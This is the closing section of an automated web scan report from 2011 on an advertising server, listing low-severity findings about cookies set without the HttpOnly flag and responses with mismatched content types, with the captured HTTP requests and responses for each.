Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/83419808/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-catamaran-sky.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/83419808/Right1/Boats/byh8-ywcharters-yen-sr10/byh8-yc-jan11-catamaran-sky.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldcharters.com
Content-Length: 310
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldcharters.com">here</a>.</p
...[SNIP]...

4.52. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiXkcU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

4.53. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1042378034/Top1/default/empty.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1042378034/Top1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1042378034/Top1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXzx;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 03:25:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiexU; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

4.54. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1072889542/Right1/default/empty.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1072889542/Right1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1072889542/Right1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXzx;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 03:25:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiexT; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

4.55. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1205137974/Right1/default/empty.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1205137974/Right1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/1205137974/Right1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXzx;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 03:25:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiexU; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

4.56. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/400899855/Top1/default/empty.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/400899855/Top1/default/empty.gif/7263485738303033424c73414270536c

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/us33d06/400899855/Top1/default/empty.gif/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXzx;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 03:25:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiexV; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://
Content-Length: 284
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://">here</a>.</p>
<hr>
<address>Apache/2.0
...[SNIP]...

5. Content type incorrectly stated  previous
There are 7 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


5.1. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/boatsearch.html/L37/913898925/Top1/Boats/bayliner8-cruiser-yen-as/sr1-bayliner8-cruiser-yen-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1635
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-as/728-cruiser-bayliner8.swf/
...[SNIP]...

5.2. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/1838745994/Position2/Boats/seabob2-yen-hp300/seabob-yen-video-hp300.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<SCRIPT type="text/javascript">
var TFSMFlash_PRETAG="";
var TFSMFlash_POSTTAG="";
var TFSMFlash_VERSION="8";
var TFSMFlash_WMODE="opaque";
var TFSMFlash_OASCLICK="http://oasc05139.247realmed
...[SNIP]...

5.3. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/284377168/Position2/Boats/bayliner8-cruiser-yen-hp300/hp300-bayliner8-cruiser-yen-hp.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1665
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/bayliner8-cruiser-yen-hp300/300-cruiser-bayliner8
...[SNIP]...

5.4. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/432546903/Right1/Boats/searay7-yacht-yen-hp/hp-searay7-yacht-yen-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 8543
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

       <script type='text/javascript'>
function expandshow_OAS_RMF_Right1() {
document.getElementById("OAS_RMF_Right1_ORG").style.display = "block" ;
document.getElementById("OAS_R
...[SNIP]...

5.5. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/homepage.html/L35/518339457/Right1/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1600
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/


<script type="text/javascript">
//<![CDATA[
var filePath = "http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Boats/hmy2-trades-yen-hp/HMYS193-trades-sky.swf/12868
...[SNIP]...

5.6. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain HTML.

Request

GET /RealMedia/ads/adstream_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/853375879/Top1/Boats/evinrudeboatshow-dallas-yen-srbd3/srbd3-evinrudeboatshow-dallas-ben-728.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:43:36 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFS=011PiXkmU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2244
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<script type="text/javascript">
function pr_swfver(){
var osf,osfd,i,axo=1,v=0,nv=navigator;
if(nv.plugins&&nv.mimeTypes.length){osf=nv.plugins["Shockwave Flash"];if(osf&&osf.description){osfd=osf.
...[SNIP]...

5.7. http://oasc05139.247realmedia.com/favicon.ico  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oasc05139.247realmedia.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: oasc05139.247realmedia.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW8003BLsABpSl; NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 01:17:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 10 Jul 2009 20:11:03 GMT
ETag: "61b7f-1cee-925783c0"
Accept-Ranges: bytes
ntCoent-Length: 7406
Content-Type: text/plain
Cache-Control: private
Content-Length: 7406

..............h...6... ..............00..........F...(....... ...........@.......................95..G<'.D:'.F<'.@9+......R...N...c...W...Z...G...Q...U..@}.......C...............T...J..Z...m...+t..t.
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Jan 28 07:39:17 CST 2011.